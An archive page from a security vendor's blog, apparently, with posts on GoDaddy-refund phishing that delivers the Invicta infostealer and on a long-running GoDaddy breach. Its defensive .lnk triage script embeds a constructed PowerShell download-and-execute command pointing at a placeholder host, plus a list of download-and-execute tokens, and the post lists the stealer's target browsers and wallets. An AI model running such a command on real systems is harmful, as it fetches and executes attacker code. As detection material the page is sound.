GoDaddy Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

GoDaddy Refund Phishing Emails Spread Infostealer
https://gridinsoft.com/blogs/godaddy-refund-phishing-infostealer/
Fri, 26 May 2023 15:32:08 +0000

The post GoDaddy Refund Phishing Emails Spread Infostealer appeared first on Gridinsoft Blog.

Hackers have started using fake GoDaddy refund emails as a disguise to trick users into installing malware. To deliver the payload they combine several tactics that are, taken together, fairly new. The payload itself is Invicta Stealer, an unusual free and open-source infostealer.

GoDaddy Refund Email Phishing

As a widely used web hosting provider, GoDaddy naturally offers several refund options. Some customers are unhappy with the service, others want to cancel domain parking or hosting for personal reasons, and refund notification emails are a normal part of handling such requests. This is what the attackers chose to imitate.

Random users started receiving emails with the subject line “GoDaddy Refund”, including people who have never interacted with the company or its services. No cases of compromised GoDaddy-owned mailboxes were reported; the messages are sent from addresses that do not belong to the company. Each email contains a fairly standard notification about an incoming refund and a link to a page “where you can get the refund details”. Even someone who has never dealt with GoDaddy will most likely be curious enough to check. The link leads to a page that, once again, imitates a genuine one the company uses to share documents.

Figure: the phishing page that redirects to the malware download.

The page does not start a download itself. Instead it redirects the victim to a Discord URL from which a .zip archive is downloaded. The archive contains a .lnk shortcut disguised as a PDF document; opening it launches a PowerShell script that downloads and runs the Invicta stealer.

Figure: properties of the .lnk file that downloads the Invicta stealer.
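
To make the archive-and-shortcut step concrete, here is an added triage script. It is my example, not code from the original post, from Gridinsoft or from the Invicta project. It parses Windows shortcut files according to the public MS-SHLLINK layout and flags the three traits described above: a document-style double extension, a PowerShell target with download-and-execute arguments, and an icon borrowed from a PDF reader. The ZIP archive, the member names, the Acrobat icon path and the stage-2 URL are all constructed for the example; nothing in it is a real sample.

```python
"""Triage a ZIP lure for Windows shortcut (.lnk) files that launch PowerShell.

Added example, not code from the original post, Gridinsoft or Invicta. The
sample archive is built in memory (no real malware); names, paths and the URL
are placeholders. Layout per MS-SHLLINK: 76-byte header, optional
LinkTargetIDList and LinkInfo blocks, then StringData fields (name, relative
path, working dir, arguments, icon), each a 2-byte char count plus UTF-16LE.
"""
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR = 0x04, 0x08, 0x10
HAS_ARGS, HAS_ICON, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))
# Heuristic tokens: script hosts and download-and-execute idioms used by LNK droppers.
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "-w hidden", "-windowstyle", "-enc", "-nop",
                     "iex", "invoke-expression", "downloadstring", "downloadfile",
                     "invoke-webrequest", "bitsadmin", "mshta", "cmd.exe /c", "wscript", "rundll32")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")


def parse_lnk(data: bytes) -> dict:
    """Read header flags and StringData, skipping the two variable-size blocks."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_IDLIST:        # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:      # LinkInfoSize (4 bytes) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            fields[key] = ""
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le", "replace")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage_lnk(member_name: str, data: bytes) -> list:
    """Findings for one shortcut; an empty list means nothing looked odd."""
    lnk = parse_lnk(data)
    findings = []
    base = member_name.rsplit("/", 1)[-1].lower()
    stem = base[:-4] if base.endswith(".lnk") else base
    if stem.endswith(DOC_EXTS):
        findings.append(f"document-style double extension: {base}")
    command = f"{lnk['relative_path']} {lnk['arguments']}".lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in command]
    if hits:
        findings.append("script host / download tokens: " + ", ".join(hits))
    target = lnk["relative_path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    icon = lnk["icon_location"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if icon and target and icon != target:   # icon taken from a different program
        findings.append(f"icon borrowed from another program: {icon} (target {target})")
    return findings


def scan_zip(zip_bytes: bytes) -> dict:
    """Map every .lnk member of the archive to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                report[info.filename] = triage_lnk(info.filename, zf.read(info))
    return report


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Build a minimal Unicode shortcut carrying only the StringData we inspect."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(76, b"\0")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments, icon_location))
    return header + body


def build_sample_zip() -> bytes:
    """Constructed lure: a 'PDF' shortcut that really runs PowerShell, plus a benign one."""
    ps = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    args = ('-w hidden -NoP -c "IEX (New-Object Net.WebClient)'
            ".DownloadString('http://stage2.example/invicta')\"")   # placeholder URL
    acrobat = r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe"  # icon lure
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("GoDaddy_Refund_Details.pdf.lnk", build_lnk(ps, args, acrobat))
        zf.writestr("Notes.lnk", build_lnk(r"..\Windows\notepad.exe", "", ""))
        zf.writestr("README.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for name, found in scan_zip(build_sample_zip()).items():
        print(name, "->", found or ["clean"])
```

The three heuristics are deliberately simple and will produce false positives on some legitimate shortcuts (installers often borrow icons, and admins do ship PowerShell shortcuts); the point is to surface the combination seen in this lure, not to replace a sandbox.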

Invicta Stealer Description

Invicta is a fairly unusual infostealer. It is free and open-source by default, meaning its source code is published on GitHub. Another piece of malware with a similar philosophy is the HiddenTear ransomware, also one of a kind. Still, in the Telegram group where the developers promote the stealer, access to its web panel is offered for $50.

Figure: the Telegram community that promotes Invicta Stealer.

The rest of Invicta's behaviour is far more conventional. Like other current stealers, it applies several anti-analysis and anti-detection tricks on execution. It then routinely starts by grabbing Discord and Steam session tokens and cryptocurrency wallet data. Wallet data is collected only from desktop applications, whereas most other stealers also target browser extensions. Browsers are handled separately: the malware takes every file that may contain valuable information. It can also target the KeePass password manager, a less common but still expected capability.

Targeted browsers and cryptowallets (names as they appear in the stealer's target list)

List of targeted web browsers:
BraveSoftware, Amigo, Chedot, Citrio, Sputnik, ChromePlus, Uran, Epic Privacy Browser, Blisk, Opera Stable, Google Chrome, Coowon, Orbitum, Elements Browser, 360Browser, Microsoft Edge, Torch, Yandex, CocCoc Browser, liebao, Vivaldi, Sleipnir, Opera Neon, QIP Surf, 7Star, Comodo Dragon, Kometa, Chromium, CentBrowser, Iridium

List of targeted cryptocurrency wallets:
Neon, neblio, Guarda, Coinomi, CloakCoin, Electrum-LTC, ark-desktop-wallet, WalletWasabi, Litecoin, Zcash, Exodus, Bitcoin, Dogecoin, ElectrumG, Electrum-Smart, Nano Wallet Desktop, Armory, Exodus Eden, VERGE, atomic, scatter, Electrum, MultiBitHD, com.liberty.jaxx, Binance, Daedalus Mainnet

Aside from passwords and session tokens, Invicta gathers some basic system information: screen size, CPU count, OS version and build, HWID, time zone and username. On receiving the corresponding command it can also collect more, for example enumerating users and installed programs. Such data is commonly used to fingerprint the system, but it can also help emulate the victim's machine for more convincing session hijacking.

How to protect yourself?

Two layers of protection apply here. The first is proactive: countering email spam and phishing pages on the Web. The second is a fallback line of defence against the spyware/stealer payload itself.

Pay attention to the emails you open. Most of them are harmless, but that is exactly what attackers count on. If you receive an email you did not expect, or its contents differ from what the sender normally sends, check it carefully. Usually you will find discrepancies in the sender's address and, in some cases, typos or mistakes in the message body. In the rarer case of business email compromise, however, it can be hard to tell whether the sender is genuine, so attention alone is no guarantee.
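
The “check the sender's address” advice can be made mechanical by comparing the visible From domain with the Return-Path and the DKIM/SPF/DMARC verdicts the receiving server already recorded. The script below is an added example (not from the original post or from GoDaddy); both messages in it are constructed, the lookalike domain uses the reserved .example TLD, and treating godaddy.com as the brand's genuine domain is an assumption for the example, since the post does not list GoDaddy's sending domains.

```python
"""Flag a 'refund' e-mail whose sender, Return-Path and authentication results disagree.

Added example, not from the original post. Both messages are constructed;
the .example TLD is reserved, and TRUSTED_DOMAINS is an assumption.
"""
import email
import re
from email.utils import parseaddr

BRAND = "godaddy"
TRUSTED_DOMAINS = {"godaddy.com"}   # assumption: the brand's genuine domain


def _domain(header_value: str) -> str:
    """Domain part of the first address in a header, lower-cased ('' if absent)."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def _aligned(domain: str, org: str) -> bool:
    """DMARC-style relaxed alignment: same domain or a subdomain of it."""
    return domain == org or domain.endswith("." + org)


def check_sender(raw: str) -> list:
    """Return findings; an empty list means the headers are consistent."""
    msg = email.message_from_string(raw)
    from_dom = _domain(msg.get("From"))
    rp_dom = _domain(msg.get("Return-Path"))
    auth = " ".join(msg.get_all("Authentication-Results", [])).lower()
    verdicts = dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", auth))
    dkim = re.search(r"header\.d=([\w.-]+)", auth)
    dkim_dom = dkim.group(1) if dkim else ""
    findings = []
    if BRAND in from_dom and not any(_aligned(from_dom, t) for t in TRUSTED_DOMAINS):
        findings.append(f"brand lookalike sender domain: {from_dom}")
    if rp_dom and not _aligned(rp_dom, from_dom):
        findings.append(f"Return-Path domain {rp_dom} does not match From domain {from_dom}")
    if dkim_dom and not _aligned(dkim_dom, from_dom):
        findings.append(f"DKIM signed by {dkim_dom}, not by the From domain")
    for mech in ("spf", "dkim", "dmarc"):
        if verdicts.get(mech) != "pass":
            findings.append(f"{mech} result: {verdicts.get(mech, 'missing')}")
    return findings


# Constructed lure: brand name in the From domain, mail actually relayed elsewhere.
SAMPLE_LURE = """\
Return-Path: <bounce@mailer-7.example>
Authentication-Results: mx.example; spf=pass smtp.mailfrom=mailer-7.example;
 dkim=pass header.d=mailer-7.example; dmarc=fail header.from=godaddy-refund.example
From: GoDaddy Billing <refund@godaddy-refund.example>
To: victim@example.com
Subject: GoDaddy Refund

Your refund is ready. View the refund details: http://link.example/refund
"""

# Constructed consistent message for comparison.
SAMPLE_OK = """\
Return-Path: <noreply@godaddy.com>
Authentication-Results: mx.example; spf=pass smtp.mailfrom=godaddy.com;
 dkim=pass header.d=godaddy.com; dmarc=pass header.from=godaddy.com
From: GoDaddy <noreply@godaddy.com>
To: customer@example.com
Subject: Your receipt

Thanks for your purchase.
"""

if __name__ == "__main__":
    for label, sample in (("lure", SAMPLE_LURE), ("ok", SAMPLE_OK)):
        print(label, "->", check_sender(sample) or ["consistent"])
```

Only trust Authentication-Results headers added by your own mail server (strip or ignore ones that arrive from outside), otherwise an attacker simply writes “dmarc=pass” into the message themselves.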

Use anti-malware software with network monitoring. Here an anti-malware program works as both a reactive and a proactive solution: the network monitor keeps you from reaching phishing pages, and if malware does arrive on the device it is still blocked, especially when the program has a well-designed proactive protection system. GridinSoft Anti-Malware is one you can rely on; consider giving it a try.

Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years
https://gridinsoft.com/blogs/attackers-hacked-godaddy/
Tue, 21 Feb 2023 09:06:58 +0000

The post Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years appeared first on Gridinsoft Blog.

GoDaddy, one of the world’s largest hosting providers and domain name registrars, reports that hackers have compromised the company’s infrastructure. Worse, the company concluded that this was only one of a series of related incidents: unknown attackers had access to its systems for several years, managed to install malware on its servers, and stole source code.

As a reminder, we also reported that the Epik hosting hack affected 15 million users, not just the company’s clients, and that Fosshost, an open-source project hosting service, is closing down after its leader disappeared.

According to a report filed by the company with the U.S. Securities and Exchange Commission, the security breach was discovered in December 2022, when customers began reporting that their sites were being used to redirect visitors to random domains. After conducting an investigation, GoDaddy experts came to disappointing conclusions:

“Based on our investigation, we believe these incidents are part of a years-long campaign by an experienced group of attackers who, among other things, installed malware on our systems and obtained source code snippets related to certain services on GoDaddy,” the company wrote.

It turned out that in December 2022 an attacker gained access to the cPanel hosting servers that customers use to manage sites hosted by GoDaddy. The hackers then installed malware of an unspecified kind on those servers, and the malware “periodically redirected random client sites to malicious ones.”

In addition, incidents dated November 2021 and March 2020 are also reported to have been linked to these attackers.

Recall that in 2021 a strange compromise of 1.2 million WordPress sites came to light. All affected resources were hosted by GoDaddy, and the company acknowledged a breach and data leak at the time: the attackers obtained the email addresses of all affected clients, their WordPress administrator passwords, sFTP and database credentials, and private SSL keys.

In 2020, GoDaddy notified 28,000 customers that in October 2019 attackers had used their credentials to log into hosting accounts and connect to them via SSH.

Now, GoDaddy says it has found additional evidence linking these attackers to a larger malware campaign that has been going on for years against other hosting companies around the world.

“We have evidence, and law enforcement confirms, that this incident is connected to an experienced and organized group targeting hosting companies such as GoDaddy. According to the information we have received, their most likely purpose is to infect websites and servers with malware to carry out phishing campaigns, spread malware and perform other malicious activities,” the company said in a statement.

GoDaddy is known to have engaged third-party security experts in the ongoing investigation and is also working with law enforcement around the world to uncover the source of these years-long attacks.
